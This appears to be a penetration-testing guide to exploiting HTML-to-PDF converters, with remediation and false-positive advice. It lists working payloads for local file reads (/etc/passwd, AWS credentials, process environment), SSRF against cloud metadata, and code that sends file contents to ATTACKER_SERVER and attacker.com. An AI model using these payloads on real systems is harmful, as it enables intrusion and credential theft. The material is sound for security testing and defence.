PDF Generation Attacks
Many web applications generate PDFs server-side using HTML-to-PDF converters (wkhtmltopdf, WeasyPrint, Puppeteer, Chrome headless, Prince). When user-controlled content is rendered into PDFs, attackers can exploit the converter for SSRF, local file reading, XSS execution, and information disclosure.
Local File Read
# If user input is rendered in the PDF, inject HTML/JS to read local files:
# iframe method (works on wkhtmltopdf):
<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
# embed method:
<embed src="file:///etc/passwd" type="text/plain" width="800" height="500">
# object method:
<object data="file:///etc/passwd" type="text/plain" width="800" height="500"></object>
# JavaScript XMLHttpRequest (if JS is enabled):
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
document.write('<pre>' + xhr.responseText + '</pre>');
</script>
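# Fetch API (Chromium-based renderers typically reject file:// URLs in fetch(); prefer the XHR or iframe methods there):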
<script>
fetch('file:///etc/passwd')
.then(r => r.text())
.then(t => document.write('<pre>' + t + '</pre>'));
</script>
# Read environment variables (Linux):
<iframe src="file:///proc/self/environ" width="800" height="500"></iframe>
# Read AWS credentials:
<iframe src="file:///home/app/.aws/credentials" width="800" height="500"></iframe>
SSRF via PDF Generation
# Force the PDF generator to make HTTP requests to internal services:
# Image tag SSRF:
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
# Link tag:
<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/">
# JavaScript-based SSRF:
<script>
var img = new Image();
img.src = 'http://internal-api:8080/admin?data=' +
encodeURIComponent(btoa(document.documentElement.innerHTML));
</script>
# Meta refresh redirect:
<meta http-equiv="refresh" content="0;url=http://169.254.169.254/latest/meta-data/">
# CSS-based SSRF:
<style>
@import url('http://169.254.169.254/latest/meta-data/');
body { background: url('http://internal:8080/admin'); }
</style>
# SVG-based SSRF:
<svg xmlns="http://www.w3.org/2000/svg">
<image href="http://169.254.169.254/latest/meta-data/" />
</svg>
Data Exfiltration
# If the PDF is returned to the attacker, data appears in the rendered PDF.
# If NOT, exfiltrate via outbound HTTP:
<script>
// Read a local file and exfiltrate it:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
var data = btoa(xhr.responseText);
// Exfiltrate via image request (URL-encode, since base64 can contain +, / and =):
var img = new Image();
img.src = 'http://ATTACKER_SERVER/exfil?data=' + encodeURIComponent(data);
</script>
# DNS-based exfiltration (if HTTP is blocked):
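<script>
// Hex-encode: base64 can contain +, / and =, which are invalid in hostnames (a DNS label is at most 63 characters).
var raw = 'sensitive-data', data = '';
for (var i = 0; i < raw.length && data.length < 60; i++)
  data += ('0' + raw.charCodeAt(i).toString(16)).slice(-2);
var img = new Image();
img.src = 'http://' + data + '.attacker.com/x.png';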
</script>
Testing Checklist
1. Identify PDF generation features (invoices, reports, exports, receipts).
2. Determine which user input appears in the PDF.
3. Test HTML injection by inserting <h1>test</h1> and checking whether it renders as a heading.
4. Test JavaScript execution with <script>document.write('XSS')</script>.
5. Test the file:// protocol for local file read.
6. Test SSRF via img, link, CSS @import, and script tags.
7. Test for cloud metadata access (169.254.169.254).
8. Check the PDF metadata for generator version information.
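The metadata check in the last step can be partly automated. The following is a minimal Python sketch, not a full PDF parser: it assumes the document information dictionary is stored uncompressed with literal (parenthesised) strings. The function name `extract_pdf_generator` and the sample bytes are illustrative only. Real files may store these fields as hex or UTF-16 strings, or inside compressed object streams, in which case a proper PDF library is needed.

```python
import re

# Matches literal-string entries such as: /Producer (Qt 4.8.7)
# Escaped characters are allowed inside the string; nested parentheses are not handled.
_INFO_ENTRY = re.compile(rb"/(Producer|Creator)\s*\(((?:\\.|[^\\()])*)\)")


def extract_pdf_generator(pdf_bytes):
    """Return the first Producer and Creator strings found in raw PDF bytes."""
    found = {}
    for key, value in _INFO_ENTRY.findall(pdf_bytes):
        # Keep only the first occurrence of each key.
        found.setdefault(key.decode("ascii"), value.decode("latin-1"))
    return found


# Hypothetical Info dictionary, shaped like the output of a Qt-based converter.
sample = b"1 0 obj\n<< /Creator (wkhtmltopdf 0.12.6) /Producer (Qt 4.8.7) >>\nendobj\n"
print(extract_pdf_generator(sample))
```

An empty result does not mean the generator is hidden; it may only mean the fields are encoded in a form this sketch does not read.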
Evidence Collection
Rendered PDF: PDF file showing injected content, file contents, or SSRF results
Request: The input that triggered the injection
CVSS Range: HTML injection: 4.3–6.1 | Local file read: 7.5–8.6 | SSRF to cloud metadata: 9.1
Remediation
- Sanitize HTML input: Strip all HTML tags or use allowlists for safe formatting tags only.
- Disable JavaScript: Configure the PDF generator to disable JS execution (wkhtmltopdf: --disable-javascript).
- Block file:// protocol: Disable local file access in the PDF renderer.
- Network isolation: Run PDF generation in a sandbox with no access to internal networks or cloud metadata.
- Use data-driven templates: Pass data to templates instead of allowing user-controlled HTML.
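Several of the items above can be combined in the code that prepares the render. The sketch below is in Python and rests on assumptions: `render_invoice_html` and `build_wkhtmltopdf_command` are hypothetical helper names, the template is a stand-in, and the converter is assumed to be wkhtmltopdf. `--disable-javascript` and `--disable-local-file-access` are existing wkhtmltopdf options; other converters need their own equivalents. The command is only built here, not executed.

```python
import html


def render_invoice_html(customer_name, note):
    """Build the HTML from a fixed template, escaping every user-supplied value."""
    # html.escape turns <, >, & and quotes into entities, so injected tags
    # are rendered as text instead of being interpreted by the converter.
    return (
        "<html><body>"
        "<h1>Invoice</h1>"
        f"<p>Customer: {html.escape(customer_name)}</p>"
        f"<p>Note: {html.escape(note)}</p>"
        "</body></html>"
    )


def build_wkhtmltopdf_command(html_path, pdf_path):
    """Return an argument list that turns off JavaScript and local file access."""
    return [
        "wkhtmltopdf",
        "--disable-javascript",
        "--disable-local-file-access",
        html_path,
        pdf_path,
    ]


page = render_invoice_html("Alice", '<iframe src="file:///etc/passwd"></iframe>')
print(page)
print(build_wkhtmltopdf_command("invoice.html", "invoice.pdf"))
```

Escaping everything is the strict end of the range; if users need limited formatting, an allowlist-based sanitizer would take its place. Network isolation still has to be enforced outside the application, for example at the container or firewall level.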
False Positive Identification
- HTML rendering without SSRF: The PDF engine rendering HTML doesn't mean it can make external requests — verify with an external callback (webhook/Burp Collaborator) before classifying as SSRF.
- Local file read blocked by sandbox: Some PDF engines sandbox file:// access — getting an error instead of file content means the sandbox is working.
- CSS injection without impact: Injecting CSS that changes PDF appearance is cosmetic — focus on data exfiltration, SSRF, and file read capabilities.
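The callback check in the first item is easier to interpret when each test carries a unique token. A minimal Python sketch follows, under stated assumptions: `CALLBACK_HOST` is a placeholder for a listener you control, and `make_canary` and `was_triggered` are hypothetical helper names. It only builds the payload and searches log lines you supply; collecting the listener's logs is left out.

```python
import uuid

# Placeholder: replace with the hostname of a callback listener you control.
CALLBACK_HOST = "callback.example.com"


def make_canary(host=CALLBACK_HOST):
    """Return a unique token and an <img> payload that requests a URL containing it."""
    token = uuid.uuid4().hex
    payload = f'<img src="http://{host}/pdf-canary/{token}.png">'
    return token, payload


def was_triggered(token, log_lines):
    """True if any listener log line mentions the token, i.e. the renderer called out."""
    return any(token in line for line in log_lines)


token, payload = make_canary()
print(payload)

# Hypothetical access-log lines copied from the listener.
logs = [f"GET /pdf-canary/{token}.png HTTP/1.1", "GET /favicon.ico HTTP/1.1"]
print(was_triggered(token, logs))
```

If the injected HTML renders in the PDF but the token never reaches the listener, the finding is HTML injection, not confirmed SSRF.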